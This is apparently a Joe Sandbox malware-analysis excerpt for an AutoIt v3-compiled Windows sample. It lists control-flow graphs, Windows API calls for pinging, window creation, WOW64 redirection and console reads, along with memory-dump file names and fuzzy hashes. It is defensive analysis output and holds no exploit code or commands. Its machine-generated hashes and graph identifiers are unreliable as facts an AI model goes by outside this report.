                                                                                                                                                                                                                                                                                    • Instruction ID: 482f51e3d45351ceb790f6880b0e054f3e7fd8e06d6b17a3c7bcc274ed3a6f66
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a5975f5b81bf02b3201b9c4be5b38a826d88c1f82fcc4478b4c620dfb17d17b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53214F71D00354AFDB109FA5EC45BAABFF4FB08750F00451AE608A72A0CBF91985CF98

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 510 b60fb8-b60fef call aee6a0 513 b60ff1-b60ffe call aec98d 510->513 514 b6100f-b61021 WSAStartup 510->514 513->514 525 b61000-b6100b call aec98d 513->525 515 b61054-b61091 call afc1f6 call ae8ec0 call aff9d4 inet_addr gethostbyname 514->515 516 b61023-b61031 514->516 533 b610a2-b610b0 515->533 534 b61093-b610a0 IcmpCreateFile 515->534 518 b61036-b61046 516->518 519 b61033 516->519 522 b6104b-b6104f 518->522 523 b61048 518->523 519->518 526 b61249-b61251 522->526 523->522 525->514 536 b610b5-b610c5 533->536 537 b610b2 533->537 534->533 535 b610d3-b61100 call b0017b call ae423c 534->535 546 b61102-b61129 IcmpSendEcho 535->546 547 b6112b-b61148 IcmpSendEcho 535->547 538 b610c7 536->538 539 b610ca-b610ce 536->539 537->536 538->539 541 b61240-b61244 call aebd98 539->541 541->526 548 b6114c-b6114e 546->548 547->548 549 b61150-b61155 548->549 550 b611ae-b611bc 548->550 553 b6115b-b61160 549->553 554 b611f8-b6120a call aee6a0 549->554 551 b611c1-b611c8 550->551 552 b611be 550->552 556 b611e4-b611ed 551->556 552->551 557 b61162-b61167 553->557 558 b611ca-b611d8 553->558 565 b61210 554->565 566 b6120c-b6120e 554->566 562 b611f2-b611f6 556->562 563 b611ef 556->563 557->550 564 b61169-b6116e 557->564 560 b611dd 558->560 561 b611da 558->561 560->556 561->560 567 b61212-b61229 IcmpCloseHandle WSACleanup 562->567 563->562 568 b61193-b611a1 564->568 569 b61170-b61175 564->569 565->567 566->567 567->541 573 b6122b-b6123d call b0013d call b00184 567->573 571 b611a6-b611ac 568->571 572 b611a3 568->572 569->558 570 b61177-b61185 569->570 574 b61187 570->574 575 b6118a-b61191 570->575 571->556 572->571 573->541 574->575 575->556
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000101,?), ref: 00B61019
                                                                                                                                                                                                                                                                                    • inet_addr.WSOCK32(?), ref: 00B61079
                                                                                                                                                                                                                                                                                    • gethostbyname.WS2_32(?), ref: 00B61085
                                                                                                                                                                                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 00B61093
                                                                                                                                                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B61123
                                                                                                                                                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B61142
                                                                                                                                                                                                                                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00B61216
                                                                                                                                                                                                                                                                                    • WSACleanup.WSOCK32 ref: 00B6121C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                    • String ID: Ping
                                                                                                                                                                                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                                    • Opcode ID: 7ef0e916ba9fcc7c08caebad25bfd8b33fd75c24daf4f942a813faf395268578
                                                                                                                                                                                                                                                                                    • Instruction ID: a81a6983d8f021b72f30a52566297147b7d983ec5e7fdfa4433d1b4b5b14d6d9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ef0e916ba9fcc7c08caebad25bfd8b33fd75c24daf4f942a813faf395268578
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C91BF316042419FD720DF29C889B16BBE0FF45318F1889A9F5699B6A2C739ED81CB81

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 580 ae370f-ae3724 581 ae3726-ae3729 580->581 582 ae3784-ae3786 580->582 583 ae378a 581->583 584 ae372b-ae3732 581->584 582->581 585 ae3788 582->585 589 b23df4-b23e1c call ae2f92 call aff23c 583->589 590 ae3790-ae3795 583->590 586 ae3738-ae373d 584->586 587 ae3804-ae380c PostQuitMessage 584->587 588 ae376f-ae3777 DefWindowProcW 585->588 593 b23e61-b23e75 call b4c8f7 586->593 594 ae3743-ae3747 586->594 597 ae37b8-ae37ba 587->597 596 ae377d-ae3783 588->596 626 b23e21-b23e28 589->626 591 ae37bc-ae37e3 SetTimer RegisterWindowMessageW 590->591 592 ae3797-ae379a 590->592 591->597 600 ae37e5-ae37f0 CreatePopupMenu 591->600 598 b23d95-b23d98 592->598 599 ae37a0-ae37b3 KillTimer call ae3907 call ae59ff 592->599 593->597 619 b23e7b 593->619 601 ae380e-ae3818 call affcad 594->601 602 ae374d-ae3752 594->602 597->596 605 b23dd0-b23def MoveWindow 598->605 606 b23d9a-b23d9e 598->606 599->597 600->597 621 ae381d 601->621 608 b23e46-b23e4d 602->608 609 ae3758-ae375d 602->609 605->597 613 b23da0-b23da3 606->613 614 b23dbf-b23dcb SetFocus 606->614 608->588 616 b23e53-b23e5c call b41423 608->616 617 ae37f2-ae3802 call ae381f 609->617 618 ae3763-ae3769 609->618 613->618 622 b23da9-b23dba call ae2f92 613->622 614->597 616->588 617->597 618->588 618->626 619->588 621->597 622->597 626->588 630 b23e2e-b23e41 call ae3907 call ae396b 626->630 630->588
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00AE3709,?,?), ref: 00AE3777
                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00AE3709,?,?), ref: 00AE37A3
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AE37C6
                                                                                                                                                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00AE3709,?,?), ref: 00AE37D1
                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00AE37E5
                                                                                                                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00AE3806
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                                    • Opcode ID: 879e09f2f4cdd3903aefa8078d181995903465967fc3efe7ff4b2ca3c6c6a29d
                                                                                                                                                                                                                                                                                    • Instruction ID: bc6b33168be31a4051e9d906db9eb6cd9d1b213aa8072b17c60fd5dd0d936884
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 879e09f2f4cdd3903aefa8078d181995903465967fc3efe7ff4b2ca3c6c6a29d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE41E2F3604184BBDF14AB6A9D5DBB93BF5EB04300F000225F50987291CEF59F448761

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 636 b190c5-b190d5 637 b190d7-b190ea call b0f636 call b0f649 636->637 638 b190ef-b190f1 636->638 654 b19471 637->654 640 b190f7-b190fd 638->640 641 b19459-b19466 call b0f636 call b0f649 638->641 640->641 644 b19103-b1912e 640->644 660 b1946c call b12b5c 641->660 644->641 647 b19134-b1913d 644->647 650 b19157-b19159 647->650 651 b1913f-b19152 call b0f636 call b0f649 647->651 652 b19455-b19457 650->652 653 b1915f-b19163 650->653 651->660 659 b19474-b19479 652->659 653->652 658 b19169-b1916d 653->658 654->659 658->651 662 b1916f-b19186 658->662 660->654 665 b191a3-b191ac 662->665 666 b19188-b1918b 662->666 669 b191ca-b191d4 665->669 670 b191ae-b191c5 call b0f636 call b0f649 call b12b5c 665->670 667 b19195-b1919e 666->667 668 b1918d-b19193 666->668 673 b1923f-b19259 667->673 668->667 668->670 671 b191d6-b191d8 669->671 672 b191db-b191dc call b13b93 669->672 698 b1938c 670->698 671->672 680 b191e1-b191f9 call b12d38 * 2 672->680 675 b1932d-b19336 call b1fc1b 673->675 676 b1925f-b1926f 673->676 687 b193a9 675->687 688 b19338-b1934a 675->688 676->675 679 b19275-b19277 676->679 679->675 683 b1927d-b192a3 679->683 707 b19216-b1923c call b197a4 680->707 708 b191fb-b19211 call b0f649 call b0f636 680->708 683->675 690 b192a9-b192bc 683->690 696 b193ad-b193c5 ReadFile 687->696 688->687 692 b1934c-b1935b GetConsoleMode 688->692 690->675 694 b192be-b192c0 690->694 692->687 697 b1935d-b19361 692->697 694->675 699 b192c2-b192ed 694->699 701 b19421-b1942c GetLastError 696->701 702 b193c7-b193cd 696->702 697->696 704 b19363-b1937d ReadConsoleW 697->704 705 b1938f-b19399 call b12d38 698->705 699->675 706 b192ef-b19302 699->706 709 b19445-b19448 701->709 710 b1942e-b19440 call b0f649 call b0f636 701->710 702->701 703 b193cf 702->703 712 b193d2-b193e4 703->712 714 b1937f GetLastError 704->714 715 b1939e-b193a7 704->715 705->659 706->675 719 b19304-b19306 706->719 707->673 708->698 716 b19385-b1938b call b0f613 709->716 717 b1944e-b19450 709->717 710->698 712->705 722 b193e6-b193ea 712->722 714->716 715->712 716->698 717->705 719->675 726 b19308-b19328 719->726 729 b19403-b1940e 722->729 730 b193ec-b193fc call b18de1 722->730 726->675 735 b19410 call b18f31 729->735 736 b1941a-b1941f call b18c21 729->736 741 b193ff-b19401 730->741 742 b19415-b19418 735->742 736->742 741->705 742->741
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 07a0b31bbbb9b7a418a2d14c736ed821ee662d47d13ce1d15d33f271591578ab
                                                                                                                                                                                                                                                                                    • Instruction ID: e7d6baa7e8e3636a0e5b00dbb002540cb0159573f14b8fb40ee979e310581773
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07a0b31bbbb9b7a418a2d14c736ed821ee662d47d13ce1d15d33f271591578ab
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EBC1D270A04289AFDB21DFA8D865BED7BF0AF09310F9401D8E524A73D2C7319982CB61

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 744 afac3e-afb063 call ae8ec0 call afbc58 call aee6a0 751 afb069-afb073 744->751 752 b38584-b38591 744->752 755 afb079-afb07e 751->755 756 b3896b-b38979 751->756 753 b38593 752->753 754 b38596-b385a5 752->754 753->754 757 b385a7 754->757 758 b385aa 754->758 761 b385b2-b385b4 755->761 762 afb084-afb090 call afb5b6 755->762 759 b3897b 756->759 760 b3897e 756->760 757->758 758->761 759->760 763 b38985-b3898e 760->763 767 b385bd 761->767 762->767 769 afb096-afb0a3 call aec98d 762->769 765 b38993 763->765 766 b38990 763->766 772 b3899c-b389eb call aee6a0 call afbbbe * 2 765->772 766->765 771 b385c7 767->771 775 afb0ab-afb0b4 769->775 776 b385cf-b385d2 771->776 805 b389f1-b38a03 call afb5b6 772->805 806 afb1e0-afb1f5 772->806 778 afb0b8-afb0d6 call b04d98 775->778 779 afb158-afb16f 776->779 780 b385d8-b38600 call b04cd3 call ae7ad5 776->780 799 afb0d8-afb0e1 778->799 800 afb0e5 778->800 782 b38954-b38957 779->782 783 afb175 779->783 814 b38602-b38606 780->814 815 b3862d-b38651 call ae7b1a call aebd98 780->815 788 b38a41-b38a79 call aee6a0 call afbbbe 782->788 789 b3895d-b38960 782->789 790 afb17b-afb17e 783->790 791 b388ff-b38920 call aee6a0 783->791 788->806 840 b38a7f-b38a91 call afb5b6 788->840 789->772 796 b38962-b38965 789->796 797 b38729-b38743 call afbbbe 790->797 798 afb184-afb187 790->798 791->806 819 b38926-b38938 call afb5b6 791->819 796->756 796->806 826 b38749-b3874c 797->826 827 b3888f-b388b5 call aee6a0 797->827 807 afb18d-afb190 798->807 808 b386ca-b386e0 call ae6c03 798->808 799->778 809 afb0e3 799->809 800->771 811 afb0eb-afb0fc 800->811 845 b38a05-b38a0d 805->845 846 b38a2f-b38a3c call aec98d 805->846 821 afb1fb-afb20b call aee6a0 806->821 822 b38ac9-b38acf 806->822 817 b38656-b38659 807->817 818 afb196-afb1b8 call aee6a0 807->818 808->806 843 b386e6-b386fc call afb5b6 808->843 809->811 811->756 820 afb102-afb11c 811->820 814->815 830 b38608-b3862b call aead40 814->830 815->817 817->756 836 b3865f-b38674 call ae6c03 817->836 818->806 862 afb1ba-afb1cc call afb5b6 818->862 865 b38945 819->865 866 b3893a-b38943 call aec98d 819->866 820->776 835 afb122-afb154 call afbbbe call aee6a0 820->835 822->775 828 b38ad5 822->828 838 b387bf-b387de call aee6a0 826->838 839 b3874e-b38751 826->839 827->806 872 b388bb-b388cd call afb5b6 827->872 828->756 830->814 830->815 835->779 836->806 869 b3867a-b38690 call afb5b6 836->869 838->806 890 b387e4-b387f6 call afb5b6 838->890 852 b38757-b38774 call aee6a0 839->852 853 b38ada-b38ae8 839->853 886 b38a93-b38a9b 840->886 887 b38ab5-b38abe call aec98d 840->887 891 b386fe-b3870b call ae8ec0 843->891 892 b3870d-b38716 call ae8ec0 843->892 860 b38a0f-b38a13 845->860 861 b38a1e-b38a29 call aeb4b1 845->861 898 b38ac2-b38ac4 846->898 852->806 901 b3877a-b3878c call afb5b6 852->901 875 b38aea 853->875 876 b38aed-b38afd 853->876 860->861 878 b38a15-b38a19 860->878 861->846 909 b38b0b-b38b19 861->909 910 b386ba-b386c3 call aec98d 862->910 911 afb1d2-afb1de 862->911 868 b38949-b3894f 865->868 866->868 868->806 912 b38692-b3869b call aec98d 869->912 913 b3869d-b386ab call ae8ec0 869->913 916 b388cf-b388dc call aec98d 872->916 917 b388de 872->917 875->876 893 b38b02-b38b06 876->893 894 b38aff 876->894 895 b38aa1-b38aa3 878->895 902 b38aa8-b38ab3 call aeb4b1 886->902 903 b38a9d 886->903 887->898 890->806 932 b387fc-b38805 call afb5b6 890->932 933 b38719-b38724 call ae8577 891->933 892->933 893->821 894->893 895->806 898->806 936 b3879f 901->936 937 b3878e-b3879d call aec98d 901->937 902->887 902->909 903->895 922 b38b1b 909->922 923 b38b1e-b38b21 909->923 910->808 911->806 943 b386ae-b386b5 912->943 913->943 931 b388e2-b388e9 916->931 917->931 922->923 923->763 939 b388f5 call ae3907 931->939 940 b388eb-b388f0 call ae396b 931->940 954 b38807-b38816 call aec98d 932->954 955 b38818 932->955 933->806 945 b387a3-b387ae call b09334 936->945 937->945 953 b388fa 939->953 940->806 943->806 945->756 959 b387b4-b387ba 945->959 953->806 958 b3881c-b3883f 954->958 955->958 961 b38841-b38848 958->961 962 b3884d-b38850 958->962 959->806 961->962 963 b38852-b3885b 962->963 964 b38860-b38863 962->964 963->964 965 b38873-b38876 964->965 966 b38865-b3886e 964->966 965->806 967 b3887c-b3888a 965->967 966->965 967->806
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                                    • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                                    • Opcode ID: ebacda7c807afdd0ef147cf643b7380e83672367345ee5e42fe0435746e80679
                                                                                                                                                                                                                                                                                    • Instruction ID: 5e7e78a99946362ffdcd9bb6013d57748728836350bd3183d0efe6f77d2b3576
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ebacda7c807afdd0ef147cf643b7380e83672367345ee5e42fe0435746e80679
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84624471508385CFC724DF24C185AAABBF0FF88344F108AAEE5998B351DB71E945CB92

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 1004 ae35b3-ae3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AE35E1
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AE3602
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00AE3368,?), ref: 00AE3616
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00AE3368,?), ref: 00AE361F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                    • Opcode ID: a621ba308ac320206cf25ff12844895fbb6fac0dc0aa17659726992fc4c79418
                                                                                                                                                                                                                                                                                    • Instruction ID: a3d5f92b64736efc6ed60bb771843a7c448f858c25ed8196104ac304aed6086b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a621ba308ac320206cf25ff12844895fbb6fac0dc0aa17659726992fc4c79418
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46F03A716002947FE7310713AC08E373EFDEBC6F50B04051EBA08AB1A0CAA91881DAB4

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 1005 ae663e-ae6654 LoadLibraryA 1006 ae6656-ae6664 GetProcAddress 1005->1006 1007 ae6674-ae6678 1005->1007 1008 ae6669-ae666b 1006->1008 1009 ae6666 1006->1009 1008->1007 1010 ae666d-ae666e FreeLibrary 1008->1010 1009->1008 1010->1007
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AE668B,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE664A
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AE665C
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00AE668B,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE666E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                    • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                    • Opcode ID: e907b3503322e40cf9dd470812378bc6103b4aad027e01fadd362419d1b942c5
                                                                                                                                                                                                                                                                                    • Instruction ID: b4f4cf396b84842c1b4c1868aef458e38d3c5c134f53f38a5d2f0052679707c2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e907b3503322e40cf9dd470812378bc6103b4aad027e01fadd362419d1b942c5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26E0C236A1666217D2222736BC0CBAE66B99FE2FE2F050215FC08F3210DFA0CC4185E5

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B25287
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AE6299
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                    • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                    • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                                    • Opcode ID: deaeb59a16904b0d7fb08e38925b3bb466179411e5e716d592d09db25d5086b1
                                                                                                                                                                                                                                                                                    • Instruction ID: 16c791640beb85c31ad4e151c778ccda554ef494a7b3a93634be51b25b7f5b1f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: deaeb59a16904b0d7fb08e38925b3bb466179411e5e716d592d09db25d5086b1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1341C171408344AEC321EB61EC45AEF7BECAF54360F004A2EF599830A1EF74D649C796

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
